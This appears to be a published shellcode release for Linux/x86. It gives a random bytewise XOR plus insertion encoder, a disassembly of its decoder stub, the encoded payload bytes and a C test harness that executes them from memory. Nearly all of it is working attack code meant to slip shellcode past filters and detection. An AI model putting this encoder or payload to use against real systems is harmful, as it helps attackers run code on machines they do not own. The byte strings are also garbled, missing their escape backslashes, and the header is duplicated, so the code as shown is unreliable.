Linux x86 Random Bytewise XOR Insertion Encoder Shellcode

/*
# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net /*
# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
*/

/****************************************************
Disassembly of section .text:

08048060 <_start>:
8048060: eb 2f jmp 8048091 <find_address>

08048062 <decoder>:
8048062: 5f pop edi
8048063: 57 push edi
8048064: 5e pop esi

08048065 <get_key>:
8048065: 8a 07 mov al,BYTE PTR [edi]
8048067: 6a 90 push 0xffffff90
8048069: 5b pop ebx
804806a: 3c aa cmp al,0xaa
804806c: 74 0a je 8048078 <decode_insertion>
804806e: 30 d8 xor al,bl

08048070 <decode_xor>:
8048070: 30 07 xor BYTE PTR [edi],al
8048072: 47 inc edi
8048073: 30 07 xor BYTE PTR [edi],al
8048075: 47 inc edi
8048076: eb ed jmp 8048065 <get_key>

08048078 <decode_insertion>:
8048078: 8d 3e lea edi,[esi]
804807a: 31 c0 xor eax,eax
804807c: 31 db xor ebx,ebx

0804807e <insertion_decoder>:
804807e: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
8048081: 80 f3 90 xor bl,0x90
8048084: 75 10 jne 8048096 <encoded>
8048086: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
804808a: 88 1f mov BYTE PTR [edi],bl
804808c: 47 inc edi
804808d: 04 02 add al,0x2
804808f: eb ed jmp 804807e <insertion_decoder>

08048091 <find_address>:
8048091: e8 cc ff ff ff call 8048062 <decoder>

08048096 <encoded>:
8048096: b7 cc mov bh,0xcc
8048098: 3d ba 0a ab f3 cmp eax,0xf3ab0aba
804809d: a3 9b bb 01 95 mov ds:0x9501bb9b,eax
80480a2: 75 d4 jne 8048078 <decode_insertion>
80480a4: bc f7 fa d9 1c mov esp,0x1cd9faf7
80480a9: 8d (bad)
80480aa: d5 1c aad 0x1c
80480ac: f7 56 73 not DWORD PTR [esi+0x73]
80480af: 31 ef xor edi,ebp
80480b1: cd a9 int 0xa9
80480b3: 34 12 xor al,0x12
80480b5: 4f dec edi
80480b6: 50 push eax
80480b7: 40 inc eax
80480b8: 71 d0 jno 804808a <insertion_decoder+0xc>
80480ba: 94 xchg esp,eax
80480bb: c4 (bad)
80480bc: f7 d7 not edi
80480be: 7f ee jg 80480ae <encoded+0x18>
80480c0: 62 (bad)
80480c1: c3 ret
80480c2: 48 dec eax
80480c3: 03 d3 add edx,ebx
80480c5: 8e 76 66 mov ?,WORD PTR [esi+0x66]
80480c8: 2c 54 sub al,0x54
80480ca: 0c 78 or al,0x78
80480cc: 05 6a 37 58 e4 add eax,0xe458376a
80480d1: 8b dc mov ebx,esp
80480d3: 04 3b add al,0x3b
80480d5: ce into
80480d6: b6 4a mov dh,0x4a
80480d8: af scas eax,DWORD PTR es:[edi]
80480d9: 53 push ebx
80480da: 59 pop ecx
80480db: a6 cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
80480dc: b5 05 mov ch,0x5
80480de: f7 30 div DWORD PTR [eax]
80480e0: 15 ea eb 09 9c adc eax,0x9c09ebea
80480e5: 60 pusha
80480e6: e4 10 in al,0x10
80480e8: 7d cc jge 80480b6 <encoded+0x20>
80480ea: 56 push esi
80480eb: cc int3
80480ec: aa stos BYTE PTR es:[edi],al
****************************************************/

#include<stdlib.h>
#include<stdio.h>
#include<string.h>

unsigned char stub[] =
"xebx31x5fx57x5ex8ax07x6ax90x5bx3cxaax74x0ax30xd8x30x07x47x30x07x47xebxedx8dx3ex31xc0x31xdbx8ax1cx06x80xf3x90x75x12x8ax5cx06x01x88x1fx47x04x02xebxedxffxe6xe8xcaxffxffxff";

unsigned char shellcode[] =
"xb7xccx3dxbax0axabxf3xa3x9bxbbx01x95x75xd4xbcxf7xfaxd9x1cx8dxd5x1cxf7x56x73x31xefxcdxa9x34x12x4fx50x40x71xd0x94xc4xf7xd7x7fxeex62xc3x48x03xd3x8ex76x66x2cx54x0cx78x05x6ax37x58xe4x8bxdcx04x3bxcexb6x4axafx53x59xa6xb5x05xf7x30x15xeaxebx09x9cx60xe4x10x7dxccx56xccxaa";

unsigned char* code;

main()
{
printf(" Stub Length: %d ", strlen(stub));
printf("Shellcode Length: %d ", strlen(shellcode));

printf("Total Length: %d ", strlen(stub) + strlen(shellcode));

code = malloc(strlen(stub) + strlen(shellcode));
memcpy(code, stub, strlen(stub));
memcpy(&code[strlen(stub)], shellcode, strlen(shellcode));

int (*ret)() = (int(*)())code;

ret();
}